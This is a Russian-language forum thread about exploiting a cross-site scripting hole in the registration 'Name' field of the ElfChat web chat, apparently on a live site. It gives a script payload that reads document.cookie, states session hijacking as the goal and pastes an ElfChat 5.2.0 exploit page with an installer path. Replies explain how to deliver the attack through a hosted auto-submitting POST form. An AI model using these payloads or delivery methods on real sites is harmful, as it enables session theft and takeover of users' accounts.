Elf xss

Discussion in 'Песочница' started by abraman, 2 Oct 2015.

  1. abraman

    abraman New Member

    Joined:
    2 Oct 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://yourspier.com/temp/ElfChat/signup.php
    Уязвимость присутствует в скрипте для регистрации в поле "Name"
    Code:
    "><script>alert("cookie: "+document.cookie);</script> 
    (работает в firefox)
    Задача перехват сессии, однако не совсем понятно каким образом можно сгенерировать вредоносную ссылку.

    Также по теме имеется exploit
    HTML:
    ElfChat 5.2.0 Pro Reinstall SCript EXploits
    ===========================================
    Author : indoushka
    Vondor : http://elfchat.ru/
    Dork:    2011 Elfet - ElfChat 5.2.0 Pro
    ==========================
    <html>
    <head>
      <meta charset="utf-8">
      <title>XSS Reflected - Jquery 1.4.2 </title>
      <script src="http://127.0.0.1/ElfChat//admin/js/jquery-1.4.2.min.js"></script>
      <script>
        $(function() {
          $('#users').each(function() {
            var select = $(this);
            var option = select.children('option').first();
            select.after(option.text());
            select.hide();
          });
        });
      </script>
    </head>
    <body>
      <form method="post">
        <p>
          <select id="users" name="users">
            <option value="xssreflected"><script>alert(&#x27;xss
    reflected - jquery 1.4.2 by - indoushka thnx to
    @firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
          </select>
        </p>
      </form>
    </body>
    </html>
    ===
    
    and :
    
    /ElfChat/js/datepicker/js/jquery.js
    /ElfChat/js/min/jquery.js
    
    Reinstall SCript :
    
    http://127.0.0.1/ElfChat/install/index.php?act=settings
     
  2. cheebeez

    cheebeez Member

    Joined:
    28 Feb 2010
    Messages:
    34
    Likes Received:
    43
    Reputations:
    1
    [DEL 56]
     
    #2 cheebeez, 3 Oct 2015
    Last edited: 25 Apr 2016
  3. abraman

    abraman New Member

    Joined:
    2 Oct 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    По видимому ты не понял в данном случае XSS реализуется не через GET, а через POST запрос. Тут нашел инфы http://www.enigmagroup.org/articles/view/Web Hacking/118-XSS-and-post-method Т.е. мы заливаем html exploit код которого указан выше меняем линки и даем link на html exploit ?
     
    #3 abraman, 3 Oct 2015
    Last edited: 3 Oct 2015
  4. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    143
    Likes Received:
    51
    Reputations:
    116
    Как один из вариантов:
    Вам нужно сделать форму с ява скриптом и разместить ее на любом хостинге. Сделать так, чтобы при загрузке по событию onload автоматически нажмется сабмит. <form method = "POST" action:"target.com/youxss">
    В параметрах Вы прописываете експлоит.